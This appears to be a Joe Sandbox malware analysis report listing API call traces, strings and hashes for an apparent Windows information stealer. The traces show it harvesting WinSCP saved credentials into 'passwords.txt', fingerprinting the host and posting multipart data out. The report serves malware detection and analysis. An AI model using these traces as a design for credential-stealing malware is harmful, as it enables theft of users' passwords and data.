                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA9
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403ED9
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403EFD
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F22
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F2C
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00403F38
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00403F41
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00417786), ref: 00403F4A
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F74
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F7E
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000000C7,?), ref: 00403F93
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,000000C7,?), ref: 00403FE6
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00403FFA
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404007
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404011
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,0042150A,00000000,?,?,?,?,?,?,?), ref: 0040406D
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040407C
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internet$lstrlen$Heap$CloseHandle$lstrcpy$Process$Free$FileOpenReadlstrcatmemcpy$AllocConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$mode$token

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,004185CA), ref: 00418615
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ntdll.dll), ref: 004187EB
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004187FB
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(user32.dll), ref: 0041880B
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(crypt32.dll), ref: 0041881B
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041882B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                • String ID: CloseHandle$CreateDCA$CreateEventA$CryptStringToBinaryA$ExitProcess$GetComputerNameA$GetCurrentProcess$GetDeviceCaps$GetProcAddress$GetProcessHeap$GetSystemInfo$GetSystemTime$GetUserDefaultLangID$GetUserNameA$GlobalMemoryStatusEx$LoadLibraryA$NtQueryInformationProcess$OpenEventA$ReleaseDC$Sleep$SystemTimeToFileTime$VirtualAlloc$VirtualAllocExNuma$VirtualFree$advapi32.dll$crypt32.dll$gdi32.dll$kernel32.dll$lstrcatA$lstrcpyA$lstrlenA$ntdll.dll$sscanf$user32.dll

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040DAD0
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040DAEC
                                                                                                                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 0040DB1A
                                                                                                                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 0040DB9D
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040DB43
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,00000004,?,?,?), ref: 0040DC49
                                                                                                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,00000400,?,?,00421509,?,?,?), ref: 0040DD2C
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0042150A,?,?,Password: ), ref: 0040DD54
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?), ref: 0040DDDF
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040DDFE
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,passwords.txt), ref: 0040DE5F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411EA0: wsprintfA.USER32 ref: 00411EB5
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memset$CloseValuelstrcpy$EnumOpenlstrcatlstrlen$??3@_invalid_parameter_noinfo_noreturnwsprintf
                                                                                                                                                                                                                                                                                • String ID: Login: $:22$Host: $HostName$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$k@$passwords.txt$#
                                                                                                                                                                                                                                                                                • API String ID: 3659326365-2564332296
                                                                                                                                                                                                                                                                                • Opcode ID: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                                • Instruction ID: 9d2ed302519055baedf3f01fb35ec56aa45f2f10d73b1c3b99b849dfdee8a1d1
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D19371B002186BDB14ABA1DC9ABFF77B9AF44704F10041EF506B7281DBBC5985CBA9

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                control_flow_graph 2574 413510-413e47 call 4101c0 call 410340 call 410290 call 410230 call 401360 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410920 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411120 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410700 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410540 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 GetCurrentProcessId call 411cc0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4107c0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411200 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411200 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4108e0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4108b0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4110a0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4109f0 call 4102e0 call 410290 call 410230 * 
2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410920 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410990 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410b30 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410be0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410ba0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410cb0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410d30 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410fe0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410d80 call 4102e0 call 410290 call 410230 * 2 call 410d80 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410530 lstrlenA call 410530 call 4101c0 call 410200 * 4 call 413e50 call 410230 * 6
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410920: GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410920: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410920: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410920: wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411120: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411120: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411120: RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411120: CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410700: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410700: memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410700: lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410700: lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,Path: ,?,?,00421508,?,?,?,?,?,?,HWID: ,?,?,00421509), ref: 0041371F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411CC0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411CC0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411CC0: CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410990: GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410990: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410990: GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410990: wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410B30: GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410B30: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410B30: RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410B30: RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410BE0: GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,?), ref: 00410C19
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410BE0: GetLastError.KERNEL32 ref: 00410C1F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410BE0: wsprintfA.USER32 ref: 00410C7B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410BA0: GetSystemInfo.KERNEL32(?), ref: 00410BAA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410BA0: wsprintfA.USER32 ref: 00410BBE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410CB0: GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410CB0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410CB0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410CB0: wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410FE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410FE0: Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410FE0: CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00421509,?,?,?,?,?,?,Install Date: ,?,?,00421509,?,?,00000000), ref: 00413D8B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$wsprintf$Open$Close$QueryValuelstrcatlstrcpy$lstrlen$CreateInfoInformationLocalNameProcess32$CapsCurrentDeviceHandleKeyboardLayoutListLocaleNextTime$CharComputerDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleObjectProcessorProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
